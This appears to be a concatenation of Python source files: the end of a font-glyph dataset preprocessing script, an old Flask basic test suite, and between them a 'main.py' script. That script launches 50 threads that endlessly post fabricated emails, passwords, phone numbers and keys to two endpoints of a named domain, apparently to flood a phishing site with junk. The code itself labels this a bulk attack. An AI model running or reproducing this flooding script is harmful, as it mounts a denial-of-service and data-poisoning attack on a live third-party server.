if not os.path.exists(os.path.join(cur_font_sfd_dir, 'imgs.npy')):
rendered = np.zeros((52, opts.img_size, opts.img_size), np.uint8)
rendered[:, :, :] = 255
rendered = rendered.tolist()
else:
rendered = np.load(os.path.join(cur_font_sfd_dir, 'imgs.npy')).tolist()
sequence = []
seq_len = []
binaryfp = []
char_class = []
for char_id in range(char_num):
example = cur_font_glyphs[char_id]
sequence.append(example['sequence'])
seq_len.append(example['seq_len'])
char_class.append(example['class'])
binaryfp = example['binary_fp']
merged_res['rendered'] = rendered
merged_res['seq_len'] = seq_len
merged_res['sequence'] = sequence
merged_res['class'] = char_class
merged_res['binary_fp'] = binaryfp
cur_process_processed_font_glyphs += [merged_res]
pickle.dump(cur_process_processed_font_glyphs, cur_process_pkl_file)
cur_process_pkl_file.close()
processes = [mp.Process(target=process, args=[pid]) for pid in range(opts.num_processes + 1)]
for p in processes:
p.start()
for p in processes:
p.join()
print("Finished processing all sfd files, logs (invalid glyphs and paths) are saved to", opts.log_dir)
def combine_perprocess_pkl_db(opts):
print("Combine all pkl files ....")
all_glyphs = []
all_glyphs_pkl_file = open(os.path.join(opts.output_path, opts.split, f'{opts.split}_all.pkl'), 'wb')
for process_id in range(opts.num_processes + 1):
cur_process_pkl_file = open(os.path.join(opts.output_path, opts.split, f'{opts.split}_{process_id:04d}-{opts.num_processes+1:04d}.pkl'), 'rb')
cur_process_glyphs = pickle.load(cur_process_pkl_file)
all_glyphs += cur_process_glyphs
pickle.dump(all_glyphs, all_glyphs_pkl_file)
all_glyphs_pkl_file.close()
return len(all_glyphs)
def cal_mean_stddev(opts):
print("Calculating all glyphs' mean stddev ....")
all_fonts_f = open(os.path.join(opts.output_path, opts.split, f'{opts.split}_all.pkl'), 'rb')
all_fonts = pickle.load(all_fonts_f)
num_fonts = len(all_fonts)
fonts_per_process = num_fonts // opts.num_processes
char_num = len(opts.alphabet)
manager = mp.Manager()
return_dict = manager.dict()
main_stddev_accum = svg_utils.MeanStddev()
def process(process_id, return_dict):
mean_stddev_accum = svg_utils.MeanStddev()
cur_sum_count = mean_stddev_accum.create_accumulator()
for i in range(process_id * fonts_per_process, (process_id + 1) * fonts_per_process):
if i >= num_fonts:
break
cur_font = all_fonts[i]
for charid in range(char_num):
cur_font_char = {}
cur_font_char['seq_len'] = cur_font['seq_len'][charid]
cur_font_char['sequence'] = cur_font['sequence'][charid]
cur_sum_count = mean_stddev_accum.add_input(cur_sum_count, cur_font_char)
return_dict[process_id] = cur_sum_count
processes = [mp.Process(target=process, args=[pid, return_dict]) for pid in range(opts.num_processes + 1)]
for p in processes:
p.start()
for p in processes:
p.join()
merged_sum_count = main_stddev_accum.merge_accumulators(return_dict.values())
output = main_stddev_accum.extract_output(merged_sum_count)
mean = output['mean']
stdev = output['stddev']
mean = np.concatenate((np.zeros([4]), mean[4:]), axis=0)
stdev = np.concatenate((np.ones([4]), stdev[4:]), axis=0)
# finally, save the mean and stddev files
np.savez(os.path.join(opts.output_path, opts.split, 'mean.npz'), mean)
np.savez(os.path.join(opts.output_path, opts.split, 'stdev.npz'), stdev)
# save_mean_stddev = svg_utils.mean_to_example(output)
# save_mean_stddev_f = open(os.path.join(opts.output_path, opts.split, f'{opts.split}_mean_stddev.pkl'), 'wb')
# pickle.dump(save_mean_stddev, save_mean_stddev_f)
def main():
parser = argparse.ArgumentParser(description="LMDB creation")
parser.add_argument("--alphabet", type=str, default='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz')
parser.add_argument("--ttf_path", type=str, default='font_ttfs')
parser.add_argument('--sfd_path', type=str, default='./font_sfds')
parser.add_argument("--output_path", type=str, default='../data/vecfont_dataset_/',
help="Path to write the database to")
parser.add_argument('--img_size', type=int, default=64)
parser.add_argument("--split", type=str, default='train')
parser.add_argument("--log_dir", type=str, default='./font_sfds/log/')
parser.add_argument("--num_processes", type=int, default=1, help="number of processes") # the real num will be opts.num_processes + 1
parser.add_argument("--phase", type=int, default=0, choices=[0, 1, 2, 3],
help="0 all, 1 create db, 2 combine_pkl_files, 3 cal stddev")
opts = parser.parse_args()
assert os.path.exists(opts.sfd_path), "specified sfd glyphs path does not exist"
split_path = os.path.join(opts.output_path, opts.split)
if not os.path.exists(split_path):
os.makedirs(split_path)
if not os.path.exists(opts.log_dir):
os.makedirs(opts.log_dir)
if opts.phase <= 1:
create_db(opts)
if opts.phase <= 2:
number_saved_glyphs = combine_perprocess_pkl_db(opts)
print(f"Number {opts.split} fonts after processing", number_saved_glyphs)
if opts.phase <= 3:
cal_mean_stddev(opts)
if __name__ == "__main__":
main()
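# Example invocation, assuming the sfd files already exist under --sfd_path
# (paths shown are the argparse defaults above; adjust as needed):
#
#   python write_data_to_pkl.py --split train --sfd_path ./font_sfds \
#       --output_path ../data/vecfont_dataset_/ --num_processes 4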
|
main.py
|
import requests, threading, random, string, randominfo
#We use the randominfo package to generate random names; to install it run -> $ pip install randominfo
#Coded by: Fabian Stevens Varon V.
#Credits - Youtube: https://www.youtube.com/watch?v=StmNWzHbQJU
def randomPhoneNumber():
phoneNumber = []
finalNumber=""
phoneNumber.append(random.randint(3, 3)) # the first digit is always 3
phoneNumber.append(random.randint(0, 2)) # the second digit is in the range 0 to 2
for i in range(1, 10): # this loop appends the remaining nine digits
phoneNumber.append(random.randint(0, 8)) # each remaining digit is in the range 0 to 8
# fill the finalNumber variable
for i in phoneNumber:
finalNumber+=str(i)
return finalNumber
#Generate the first part of a fake email
def randomEmailName(gender):
emailName = randominfo.get_first_name(gender)
return emailName
#Generate a random password that may contain special characters and digits
def randomPassword(length,special_chars,digits):
password = randominfo.random_password(length,special_chars,digits)
return password
#Send first request i.e: {'myData': '5277'}
def doRequestTest2(dataTest2):
url= 'https://blitloginnpersons.com/test2.php'
response = requests.post(url, dataTest2).status_code
return response
#Send second request i.e: {'myData': 'Nilam@yahoo.com xD7Cs*!ax | 32842082767'}
def doRequestTest3(dataTest3):
url= 'https://blitloginnpersons.com/test3.php'
response = requests.post(url, dataTest3).status_code
return response
#To create a dynamic 4-digit key --> required by doRequestTest2()
def randomWithNDigits(n):
range_start = 10**(n-1)
range_end = (10**n)-1
return random.randint(range_start, range_end)
if __name__ == "__main__":
def bulkAttack():
successAttacks=0 #To accumulate successful attacks
while True:
gender = ("male", "female") #To pick between Male & Female
emailLastPart = ("@gmail.com", "@outlook.com", "@yahoo.com", "@hotmail.com") #To create dynamic fake email providers
dynamicKey = randomWithNDigits(4) #To generate a 4-digit key
#Creates a fake email calling randomEmailName and adding emailLastPart
email= randomEmailName(gender= random.choice(gender))+random.choice(emailLastPart)
#Creates a dynamic password with random "security" levels
password = randomPassword(length=random.randint(8,9), special_chars=bool(random.getrandbits(1)), digits=bool(random.getrandbits(1)))
tel= '| ' + str(randomPhoneNumber()) #Creates a fake Mobile number
dataTest2 = {'myData': f'{dynamicKey}'} #Create dict with Attack2 info
dataTest3 = {'myData': f'{email} {password} {tel}'} #Create dict with Attack3 info
print(f"Attack2 info: {dataTest2}") #Control Print
print(f"Attack3 info: {dataTest3}") #Control Print
attackT2= doRequestTest2(dataTest2=dataTest2) #Call attackT2 fun
attackT3= doRequestTest3(dataTest3=dataTest3) #Call attackT3 fun
#If both responses are 200, increase the successAttacks count by 1
if attackT2 == 200 and attackT3 == 200:
successAttacks+=1
print(f"Successful Attacks: {successAttacks}") #Control Print
else:
print(f"Error: {attackT2} - {attackT3}")
#Create 50 threads to send multiple different requests at a time.
threads = []
for i in range(50):
t = threading.Thread(target=bulkAttack)
t.daemon = True
threads.append(t)
for i in range(50):
threads[i].start()
for i in range(50):
threads[i].join()
|
basic.py
|
# -*- coding: utf-8 -*-
"""
flask.testsuite.basic
~~~~~~~~~~~~~~~~~~~~~
The basic functionality.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from __future__ import with_statement
import re
import flask
import pickle
import unittest
from datetime import datetime
from threading import Thread
from flask.testsuite import FlaskTestCase, emits_module_deprecation_warning
from werkzeug.exceptions import BadRequest, NotFound
from werkzeug.http import parse_date
from werkzeug.routing import BuildError
class BasicFunctionalityTestCase(FlaskTestCase):
def test_options_work(self):
app = flask.Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
return 'Hello World'
rv = app.test_client().open('/', method='OPTIONS')
self.assert_equal(sorted(rv.allow), ['GET', 'HEAD', 'OPTIONS', 'POST'])
self.assert_equal(rv.data, '')
def test_options_on_multiple_rules(self):
app = flask.Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
return 'Hello World'
@app.route('/', methods=['PUT'])
def index_put():
return 'Aha!'
rv = app.test_client().open('/', method='OPTIONS')
self.assert_equal(sorted(rv.allow), ['GET', 'HEAD', 'OPTIONS', 'POST', 'PUT'])
def test_options_handling_disabled(self):
app = flask.Flask(__name__)
def index():
return 'Hello World!'
index.provide_automatic_options = False
app.route('/')(index)
rv = app.test_client().open('/', method='OPTIONS')
self.assert_equal(rv.status_code, 405)
app = flask.Flask(__name__)
def index2():
return 'Hello World!'
index2.provide_automatic_options = True
app.route('/', methods=['OPTIONS'])(index2)
rv = app.test_client().open('/', method='OPTIONS')
self.assert_equal(sorted(rv.allow), ['OPTIONS'])
def test_request_dispatching(self):
app = flask.Flask(__name__)
@app.route('/')
def index():
return flask.request.method
@app.route('/more', methods=['GET', 'POST'])
def more():
return flask.request.method
c = app.test_client()
self.assert_equal(c.get('/').data, 'GET')
rv = c.post('/')
self.assert_equal(rv.status_code, 405)
self.assert_equal(sorted(rv.allow), ['GET', 'HEAD', 'OPTIONS'])
rv = c.head('/')
self.assert_equal(rv.status_code, 200)
self.assert_(not rv.data) # head truncates
self.assert_equal(c.post('/more').data, 'POST')
self.assert_equal(c.get('/more').data, 'GET')
rv = c.delete('/more')
self.assert_equal(rv.status_code, 405)
self.assert_equal(sorted(rv.allow), ['GET', 'HEAD', 'OPTIONS', 'POST'])
def test_url_mapping(self):
app = flask.Flask(__name__)
def index():
return flask.request.method
def more():
return flask.request.method
app.add_url_rule('/', 'index', index)
app.add_url_rule('/more', 'more', more, methods=['GET', 'POST'])
c = app.test_client()
self.assert_equal(c.get('/').data, 'GET')
rv = c.post('/')
self.assert_equal(rv.status_code, 405)
self.assert_equal(sorted(rv.allow), ['GET', 'HEAD', 'OPTIONS'])
rv = c.head('/')
self.assert_equal(rv.status_code, 200)
self.assert_(not rv.data) # head truncates
self.assert_equal(c.post('/more').data, 'POST')
self.assert_equal(c.get('/more').data, 'GET')
rv = c.delete('/more')
self.assert_equal(rv.status_code, 405)
self.assert_equal(sorted(rv.allow), ['GET', 'HEAD', 'OPTIONS', 'POST'])
def test_werkzeug_routing(self):
from werkzeug.routing import Submount, Rule
app = flask.Flask(__name__)
app.url_map.add(Submount('/foo', [
Rule('/bar', endpoint='bar'),
Rule('/', endpoint='index')
]))
def bar():
return 'bar'
def index():
return 'index'
app.view_functions['bar'] = bar
app.view_functions['index'] = index
c = app.test_client()
self.assert_equal(c.get('/foo/').data, 'index')
self.assert_equal(c.get('/foo/bar').data, 'bar')
def test_endpoint_decorator(self):
from werkzeug.routing import Submount, Rule
app = flask.Flask(__name__)
app.url_map.add(Submount('/foo', [
Rule('/bar', endpoint='bar'),
Rule('/', endpoint='index')
]))
@app.endpoint('bar')
def bar():
return 'bar'
@app.endpoint('index')
def index():
return 'index'
c = app.test_client()
self.assert_equal(c.get('/foo/').data, 'index')
self.assert_equal(c.get('/foo/bar').data, 'bar')
def test_session(self):
app = flask.Flask(__name__)
app.secret_key = 'testkey'
@app.route('/set', methods=['POST'])
def set():
flask.session['value'] = flask.request.form['value']
return 'value set'
@app.route('/get')
def get():
return flask.session['value']
c = app.test_client()
self.assert_equal(c.post('/set', data={'value': '42'}).data, 'value set')
self.assert_equal(c.get('/get').data, '42')
def test_session_using_server_name(self):
app = flask.Flask(__name__)
app.config.update(
SECRET_KEY='foo',
SERVER_NAME='example.com'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://example.com/')
self.assert_('domain=.example.com' in rv.headers['set-cookie'].lower())
self.assert_('httponly' in rv.headers['set-cookie'].lower())
def test_session_using_server_name_and_port(self):
app = flask.Flask(__name__)
app.config.update(
SECRET_KEY='foo',
SERVER_NAME='example.com:8080'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://example.com:8080/')
self.assert_('domain=.example.com' in rv.headers['set-cookie'].lower())
self.assert_('httponly' in rv.headers['set-cookie'].lower())
def test_session_using_application_root(self):
class PrefixPathMiddleware(object):
def __init__(self, app, prefix):
self.app = app
self.prefix = prefix
def __call__(self, environ, start_response):
environ['SCRIPT_NAME'] = self.prefix
return self.app(environ, start_response)
app = flask.Flask(__name__)
app.wsgi_app = PrefixPathMiddleware(app.wsgi_app, '/bar')
app.config.update(
SECRET_KEY='foo',
APPLICATION_ROOT='/bar'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://example.com:8080/')
self.assert_('path=/bar' in rv.headers['set-cookie'].lower())
def test_session_using_session_settings(self):
app = flask.Flask(__name__)
app.config.update(
SECRET_KEY='foo',
SERVER_NAME='www.example.com:8080',
APPLICATION_ROOT='/test',
SESSION_COOKIE_DOMAIN='.example.com',
SESSION_COOKIE_HTTPONLY=False,
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_PATH='/'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://www.example.com:8080/test/')
cookie = rv.headers['set-cookie'].lower()
self.assert_('domain=.example.com' in cookie)
self.assert_('path=/;' in cookie)
self.assert_('secure' in cookie)
self.assert_('httponly' not in cookie)
def test_missing_session(self):
app = flask.Flask(__name__)
def expect_exception(f, *args, **kwargs):
try:
f(*args, **kwargs)
except RuntimeError, e:
self.assert_(e.args and 'session is unavailable' in e.args[0])
else:
self.assert_(False, 'expected exception')
with app.test_request_context():
self.assert_(flask.session.get('missing_key') is None)
expect_exception(flask.session.__setitem__, 'foo', 42)
expect_exception(flask.session.pop, 'foo')
def test_session_expiration(self):
permanent = True
app = flask.Flask(__name__)
app.secret_key = 'testkey'
@app.route('/')
def index():
flask.session['test'] = 42
flask.session.permanent = permanent
return ''
@app.route('/test')
def test():
return unicode(flask.session.permanent)
client = app.test_client()
rv = client.get('/')
self.assert_('set-cookie' in rv.headers)
match = re.search(r'\bexpires=([^;]+)', rv.headers['set-cookie'])
expires = parse_date(match.group())
expected = datetime.utcnow() + app.permanent_session_lifetime
self.assert_equal(expires.year, expected.year)
self.assert_equal(expires.month, expected.month)
self.assert_equal(expires.day, expected.day)
rv = client.get('/test')
self.assert_equal(rv.data, 'True')
permanent = False
rv = app.test_client().get('/')
self.assert_('set-cookie' in rv.headers)
match = re.search(r'\bexpires=([^;]+)', rv.headers['set-cookie'])
self.assert_(match is None)
def test_session_stored_last(self):
app = flask.Flask(__name__)
app.secret_key = 'development-key'
app.testing = True
@app.after_request
def modify_session(response):
flask.session['foo'] = 42
return response
@app.route('/')
def dump_session_contents():
return repr(flask.session.get('foo'))
c = app.test_client()
self.assert_equal(c.get('/').data, 'None')
self.assert_equal(c.get('/').data, '42')
def test_session_special_types(self):
app = flask.Flask(__name__)
app.secret_key = 'development-key'
app.testing = True
now = datetime.utcnow().replace(microsecond=0)
@app.after_request
def modify_session(response):
flask.session['m'] = flask.Markup('Hello!')
flask.session['dt'] = now
flask.session['t'] = (1, 2, 3)
return response
@app.route('/')
def dump_session_contents():
return pickle.dumps(dict(flask.session))
c = app.test_client()
c.get('/')
rv = pickle.loads(c.get('/').data)
self.assert_equal(rv['m'], flask.Markup('Hello!'))
self.assert_equal(type(rv['m']), flask.Markup)
self.assert_equal(rv['dt'], now)
self.assert_equal(rv['t'], (1, 2, 3))
def test_flashes(self):
app = flask.Flask(__name__)
app.secret_key = 'testkey'
with app.test_request_context():
self.assert_(not flask.session.modified)
flask.flash('Zap')
flask.session.modified = False
flask.flash('Zip')
self.assert_(flask.session.modified)
self.assert_equal(list(flask.get_flashed_messages()), ['Zap', 'Zip'])
def test_extended_flashing(self):
# Be sure app.testing=True below, else tests can fail silently.
#
# Specifically, if app.testing is not set to True, the AssertionErrors
# in the view functions will cause a 500 response to the test client
# instead of propagating exceptions.
app = flask.Flask(__name__)
app.secret_key = 'testkey'
app.testing = True
@app.route('/')
def index():
flask.flash(u'Hello World')
flask.flash(u'Hello World', 'error')
flask.flash(flask.Markup(u'<em>Testing</em>'), 'warning')
return ''
@app.route('/test/')
def test():
messages = flask.get_flashed_messages()
self.assert_equal(len(messages), 3)
self.assert_equal(messages[0], u'Hello World')
self.assert_equal(messages[1], u'Hello World')
self.assert_equal(messages[2], flask.Markup(u'<em>Testing</em>'))
return ''
@app.route('/test_with_categories/')
def test_with_categories():
messages = flask.get_flashed_messages(with_categories=True)
self.assert_equal(len(messages), 3)
self.assert_equal(messages[0], ('message', u'Hello World'))
self.assert_equal(messages[1], ('error', u'Hello World'))
self.assert_equal(messages[2], ('warning', flask.Markup(u'<em>Testing</em>')))
return ''
@app.route('/test_filter/')
def test_filter():
messages = flask.get_flashed_messages(category_filter=['message'], with_categories=True)
self.assert_equal(len(messages), 1)
self.assert_equal(messages[0], ('message', u'Hello World'))
return ''
@app.route('/test_filters/')
def test_filters():
messages = flask.get_flashed_messages(category_filter=['message', 'warning'], with_categories=True)
self.assert_equal(len(messages), 2)
self.assert_equal(messages[0], ('message', u'Hello World'))
self.assert_equal(messages[1], ('warning', flask.Markup(u'<em>Testing</em>')))
return ''
@app.route('/test_filters_without_returning_categories/')
def test_filters2():
messages = flask.get_flashed_messages(category_filter=['message', 'warning'])
self.assert_equal(len(messages), 2)
self.assert_equal(messages[0], u'Hello World')
self.assert_equal(messages[1], flask.Markup(u'<em>Testing</em>'))
return ''
# Create new test client on each test to clean flashed messages.
c = app.test_client()
c.get('/')
c.get('/test/')
c = app.test_client()
c.get('/')
c.get('/test_with_categories/')
c = app.test_client()
c.get('/')
c.get('/test_filter/')
c = app.test_client()
c.get('/')
c.get('/test_filters/')
c = app.test_client()
c.get('/')
c.get('/test_filters_without_returning_categories/')
def test_request_processing(self):
app = flask.Flask(__name__)
evts = []
@app.before_request
def before_request():
evts.append('before')
@app.after_request
def after_request(response):
response.data += '|after'
evts.append('after')
return response
@app.route('/')
def index():
self.assert_('before' in evts)
self.assert_('after' not in evts)
return 'request'
self.assert_('after' not in evts)
rv = app.test_client().get('/').data
self.assert_('after' in evts)
self.assert_equal(rv, 'request|after')
def test_after_request_processing(self):
app = flask.Flask(__name__)
app.testing = True
@app.route('/')
def index():
@flask.after_this_request
def foo(response):
response.headers['X-Foo'] = 'a header'
return response
return 'Test'
c = app.test_client()
resp = c.get('/')
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.headers['X-Foo'], 'a header')
def test_teardown_request_handler(self):
called = []
app = flask.Flask(__name__)
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route('/')
def root():
return "Response"
rv = app.test_client().get('/')
self.assert_equal(rv.status_code, 200)
self.assert_('Response' in rv.data)
self.assert_equal(len(called), 1)
def test_teardown_request_handler_debug_mode(self):
called = []
app = flask.Flask(__name__)
app.testing = True
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route('/')
def root():
return "Response"
rv = app.test_client().get('/')
self.assert_equal(rv.status_code, 200)
self.assert_('Response' in rv.data)
self.assert_equal(len(called), 1)
def test_teardown_request_handler_error(self):
called = []
app = flask.Flask(__name__)
@app.teardown_request
def teardown_request1(exc):
self.assert_equal(type(exc), ZeroDivisionError)
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError
except:
pass
@app.teardown_request
def teardown_request2(exc):
self.assert_equal(type(exc), ZeroDivisionError)
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError
except:
pass
@app.route('/')
def fails():
1/0
rv = app.test_client().get('/')
self.assert_equal(rv.status_code, 500)
self.assert_('Internal Server Error' in rv.data)
self.assert_equal(len(called), 2)
def test_before_after_request_order(self):
called = []
app = flask.Flask(__name__)
@app.before_request
def before1():
called.append(1)
@app.before_request
def before2():
called.append(2)
@app.after_request
def after1(response):
called.append(4)
return response
@app.after_request
def after2(response):
called.append(3)
return response
@app.teardown_request
def finish1(exc):
called.append(6)
@app.teardown_request
def finish2(exc):
called.append(5)
@app.route('/')
def index():
return '42'
rv = app.test_client().get('/')
self.assert_equal(rv.data, '42')
self.assert_equal(called, [1, 2, 3, 4, 5, 6])
def test_error_handling(self):
app = flask.Flask(__name__)
@app.errorhandler(404)
def not_found(e):
return 'not found', 404
@app.errorhandler(500)
def internal_server_error(e):
return 'internal server error', 500
@app.route('/')
def index():
flask.abort(404)
@app.route('/error')
def error():
1 // 0
c = app.test_client()
rv = c.get('/')
self.assert_equal(rv.status_code, 404)
self.assert_equal(rv.data, 'not found')
rv = c.get('/error')
self.assert_equal(rv.status_code, 500)
self.assert_equal('internal server error', rv.data)
def test_before_request_and_routing_errors(self):
app = flask.Flask(__name__)
@app.before_request
def attach_something():
flask.g.something = 'value'
@app.errorhandler(404)
def return_something(error):
return flask.g.something, 404
rv = app.test_client().get('/')
self.assert_equal(rv.status_code, 404)
self.assert_equal(rv.data, 'value')
def test_user_error_handling(self):
class MyException(Exception):
pass
app = flask.Flask(__name__)
@app.errorhandler(MyException)
def handle_my_exception(e):
self.assert_(isinstance(e, MyException))
return '42'
@app.route('/')
def index():
raise MyException()
c = app.test_client()
self.assert_equal(c.get('/').data, '42')
def test_trapping_of_bad_request_key_errors(self):
app = flask.Flask(__name__)
app.testing = True
@app.route('/fail')
def fail():
flask.request.form['missing_key']
c = app.test_client()
self.assert_equal(c.get('/fail').status_code, 400)
app.config['TRAP_BAD_REQUEST_ERRORS'] = True
c = app.test_client()
try:
c.get('/fail')
except KeyError, e:
self.assert_(isinstance(e, BadRequest))
else:
self.fail('Expected exception')
def test_trapping_of_all_http_exceptions(self):
app = flask.Flask(__name__)
app.testing = True
app.config['TRAP_HTTP_EXCEPTIONS'] = True
@app.route('/fail')
def fail():
flask.abort(404)
c = app.test_client()
try:
c.get('/fail')
except NotFound, e:
pass
else:
self.fail('Expected exception')
def test_enctype_debug_helper(self):
from flask.debughelpers import DebugFilesKeyError
app = flask.Flask(__name__)
app.debug = True
@app.route('/fail', methods=['POST'])
def index():
return flask.request.files['foo'].filename
# with statement is important because we leave an exception on the
# stack otherwise and we want to ensure that this is not the case
# to not negatively affect other tests.
with app.test_client() as c:
try:
c.post('/fail', data={'foo': 'index.txt'})
except DebugFilesKeyError, e:
self.assert_('no file contents were transmitted' in str(e))
self.assert_('This was submitted: "index.txt"' in str(e))
else:
self.fail('Expected exception')
def test_teardown_on_pop(self):
buffer = []
app = flask.Flask(__name__)
@app.teardown_request
def end_of_request(exception):
buffer.append(exception)
ctx = app.test_request_context()
ctx.push()
self.assert_equal(buffer, [])
ctx.pop()
self.assert_equal(buffer, [None])
def test_response_creation(self):
app = flask.Flask(__name__)
@app.route('/unicode')
def from_unicode():
return u'Hällo Wörld'
@app.route('/string')
def from_string():
return u'Hällo Wörld'.encode('utf-8')
@app.route('/args')
def from_tuple():
return 'Meh', 400, {
'X-Foo': 'Testing',
'Content-Type': 'text/plain; charset=utf-8'
}
c = app.test_client()
self.assert_equal(c.get('/unicode').data, u'Hällo Wörld'.encode('utf-8'))
self.assert_equal(c.get('/string').data, u'Hällo Wörld'.encode('utf-8'))
rv = c.get('/args')
self.assert_equal(rv.data, 'Meh')
self.assert_equal(rv.headers['X-Foo'], 'Testing')
self.assert_equal(rv.status_code, 400)
self.assert_equal(rv.mimetype, 'text/plain')
def test_make_response(self):
app = flask.Flask(__name__)
with app.test_request_context():
rv = flask.make_response()
self.assert_equal(rv.status_code, 200)
self.assert_equal(rv.data, '')
self.assert_equal(rv.mimetype, 'text/html')
rv = flask.make_response('Awesome')
self.assert_equal(rv.status_code, 200)
self.assert_equal(rv.data, 'Awesome')
self.assert_equal(rv.mimetype, 'text/html')
rv = flask.make_response('W00t', 404)
self.assert_equal(rv.status_code, 404)
self.assert_equal(rv.data, 'W00t')
self.assert_equal(rv.mimetype, 'text/html')
def test_make_response_with_response_instance(self):
app = flask.Flask(__name__)
with app.test_request_context():
rv = flask.make_response(
flask.jsonify({'msg': 'W00t'}), 400)
self.assertEqual(rv.status_code, 400)
self.assertEqual(rv.data,
'{\n "msg": "W00t"\n}')
self.assertEqual(rv.mimetype, 'application/json')
rv = flask.make_response(
flask.Response(''), 400)
self.assertEqual(rv.status_code, 400)
self.assertEqual(rv.data, '')
self.assertEqual(rv.mimetype, 'text/html')
rv = flask.make_response(
flask.Response('', headers={'Content-Type': 'text/html'}),
400, [('X-Foo', 'bar')])
self.assertEqual(rv.status_code, 400)
self.assertEqual(rv.headers['Content-Type'], 'text/html')
self.assertEqual(rv.headers['X-Foo'], 'bar')
def test_url_generation(self):
app = flask.Flask(__name__)
@app.route('/hello/<name>', methods=['POST'])
def hello():
pass
with app.test_request_context():
self.assert_equal(flask.url_for('hello', name='test x'), '/hello/test%20x')
self.assert_equal(flask.url_for('hello', name='test x', _external=True),
'http://localhost/hello/test%20x')
def test_build_error_handler(self):
app = flask.Flask(__name__)
# Test base case, a URL which results in a BuildError.
with app.test_request_context():
self.assertRaises(BuildError, flask.url_for, 'spam')
# Verify the error is re-raised if not the current exception.
try:
with app.test_request_context():
flask.url_for('spam')
except BuildError, error:
pass
try:
raise RuntimeError('Test case where BuildError is not current.')
except RuntimeError:
self.assertRaises(BuildError, app.handle_url_build_error, error, 'spam', {})
# Test a custom handler.
def handler(error, endpoint, values):
# Just a test.
return '/test_handler/'
app.url_build_error_handlers.append(handler)
with app.test_request_context():
self.assert_equal(flask.url_for('spam'), '/test_handler/')
def test_custom_converters(self):
from werkzeug.routing import BaseConverter
class ListConverter(BaseConverter):
def to_python(self, value):
return value.split(',')
def to_url(self, value):
base_to_url = super(ListConverter, self).to_url
return ','.join(base_to_url(x) for x in value)
app = flask.Flask(__name__)
app.url_map.converters['list'] = ListConverter
@app.route('/<list:args>')
def index(args):
return '|'.join(args)
c = app.test_client()
self.assert_equal(c.get('/1,2,3').data, '1|2|3')
def test_static_files(self):
app = flask.Flask(__name__)
rv = app.test_client().get('/static/index.html')
self.assert_equal(rv.status_code, 200)
self.assert_equal(rv.data.strip(), '<h1>Hello World!</h1>')
with app.test_request_context():
self.assert_equal(flask.url_for('static', filename='index.html'),
'/static/index.html')
def test_none_response(self):
app = flask.Flask(__name__)
@app.route('/')
def test():
return None
try:
app.test_client().get('/')
except ValueError, e:
self.assert_equal(str(e), 'View function did not return a response')
else:
self.fail('Expected ValueError')
def test_request_locals(self):
self.assert_equal(repr(flask.g), '<LocalProxy unbound>')
self.assertFalse(flask.g)
def test_proper_test_request_context(self):
app = flask.Flask(__name__)
app.config.update(
SERVER_NAME='localhost.localdomain:5000'
)
@app.route('/')
def index():
return None
@app.route('/', subdomain='foo')
def sub():
return None
with app.test_request_context('/'):
self.assert_equal(flask.url_for('index', _external=True), 'http://localhost.localdomain:5000/')
with app.test_request_context('/'):
self.assert_equal(flask.url_for('sub', _external=True), 'http://foo.localhost.localdomain:5000/')
try:
with app.test_request_context('/', environ_overrides={'HTTP_HOST': 'localhost'}):
pass
except Exception, e:
self.assert_(isinstance(e, ValueError))
self.assert_equal(str(e), "the server name provided " +
"('localhost.localdomain:5000') does not match the " + \
"server name from the WSGI environment ('localhost')")
try:
app.config.update(SERVER_NAME='localhost')
with app.test_request_context('/', environ_overrides={'SERVER_NAME': 'localhost'}):
pass
except ValueError, e:
raise ValueError(
"No ValueError exception should have been raised \"%s\"" % e
)
try:
app.config.update(SERVER_NAME='localhost:80')
with app.test_request_context('/', environ_overrides={'SERVER_NAME': 'localhost:80'}):
pass
except ValueError, e:
raise ValueError(
"No ValueError exception should have been raised \"%s\"" % e
)
def test_test_app_proper_environ(self):
app = flask.Flask(__name__)
app.config.update(
SERVER_NAME='localhost.localdomain:5000'
)
@app.route('/')
def index():
return 'Foo'
@app.route('/', subdomain='foo')
def subdomain():
return 'Foo SubDomain'
rv = app.test_client().get('/')
self.assert_equal(rv.data, 'Foo')
rv = app.test_client().get('/', 'http://localhost.localdomain:5000')
self.assert_equal(rv.data, 'Foo')
rv = app.test_client().get('/', 'https://localhost.localdomain:5000')
self.assert_equal(rv.data, 'Foo')
app.config.update(SERVER_NAME='localhost.localdomain')
rv = app.test_client().get('/', 'https://localhost.localdomain')
self.assert_equal(rv.data, 'Foo')
try:
app.config.update(SERVER_NAME='localhost.localdomain:443')
rv = app.test_client().get('/', 'https://localhost.localdomain')
# Werkzeug 0.8
self.assert_equal(rv.status_code, 404)
except ValueError, e:
# Werkzeug 0.7
self.assert_equal(str(e), "the server name provided " +
"('localhost.localdomain:443') does not match the " + \
"server name from the WSGI environment ('localhost.localdomain')")
try:
app.config.update(SERVER_NAME='localhost.localdomain')
rv = app.test_client().get('/', 'http://foo.localhost')
# Werkzeug 0.8
self.assert_equal(rv.status_code, 404)
except ValueError, e:
# Werkzeug 0.7
self.assert_equal(str(e), "the server name provided " + \
"('localhost.localdomain') does not match the " + \
"server name from the WSGI environment ('foo.localhost')")
rv = app.test_client().get('/', 'http://foo.localhost.localdomain')
self.assert_equal(rv.data, 'Foo SubDomain')
def test_exception_propagation(self):
def apprunner(config_key):
app = flask.Flask(__name__)
@app.route('/')
def index():
1/0
c = app.test_client()
if config_key is not None:
app.config[config_key] = True
try:
resp = c.get('/')
except Exception:
